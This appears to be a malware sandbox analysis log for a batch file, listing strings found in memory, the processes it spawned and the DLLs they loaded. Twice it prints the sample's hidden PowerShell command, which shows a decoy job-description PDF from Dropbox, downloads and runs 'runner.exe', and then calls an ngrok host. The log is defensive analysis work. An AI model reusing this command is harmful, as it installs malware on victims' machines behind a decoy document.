Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: SELECT %s FROM %s WHERE %s = %u OR %s = %u OR %s = %u or %s = %u;
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: SELECT ContainerID FROM ObjectDirTAB WHERE ObjectID = %u;
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.0000000001683000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2410433167.0000000001683000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: SELECT ContainerID FROM ObjectDirTAB WHERE ObjectID = %u;SELECT DISTINCT ContainerID FROM ObjectDirTAB WHERE ObjectID IN (SELECT ObjectID FROM CrossRefTAB WHERE TargetObject IN (SELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u)) AND ContainerID != %uSELECT DISTINCT ContainerID FROM ObjectDirTAB WHERE ObjectID IN (SELECT ObjectID FROM ObjectDirTAB WHERE FatherID = %u)SELECT DISTINCT ContainerID FROM ObjectDirTAB WHERE ObjectID IN (SELECT TargetObject FROM CrossRefTAB Where ObjectID IN (SELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u)) AND ContainerID != %uSELECT DISTINCT ContainerID FROM ObjectDirTAB WHERE FatherID IN (SELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u);SELECT DISTINCT ContainerID FROM ObjectDirTAB Where ObjectID IN (SELECT FatherID FROM ObjectDirTAB WHERE ContainerID = %u);DirectoryIDDirectoryTABSCCStatusSCCStatusAttributesSELECT %s FROM %s WHERE %s = %u OR %s = %u OR %s = %u or %s = %u;FatTABSCCStatusDataSELECT ObjectID FROM ObjectDirTAB WHERE ContainerID = %u AND ContainerID <> ObjectID;Property(%uClass(MetaDataItemRemovedEventMetaDataItemAddedEventMetaDataCreatedEventMetaData

Source: 122046760.bat

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\122046760.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\a0df86d4-9e44-49c4-ab97-66c1270d73b1.pdf
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate "C:\Users\user\AppData\Local\Temp\a0df86d4-9e44-49c4-ab97-66c1270d73b1.pdf"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2068,i,611884074151080472,7705597569893069782,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6408 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:6
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6680 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6928 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7756 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7756 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2176,i,8689619107775136306,13068804548118690571,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=2096,i,12285392887424033098,7395190095907951401,262144 /prefetch:3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe "C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe"
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Process created: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe "C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe"
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6720 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 444
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\System32\fontdrvhost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9172 -s 136
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\a0df86d4-9e44-49c4-ab97-66c1270d73b1.pdf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe "C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2068,i,611884074151080472,7705597569893069782,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6408 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:6	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6680 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6928 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7756 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7756 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9172 -s 136	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6720 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2176,i,8689619107775136306,13068804548118690571,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=2096,i,12285392887424033098,7395190095907951401,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Process created: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe "C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe"
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
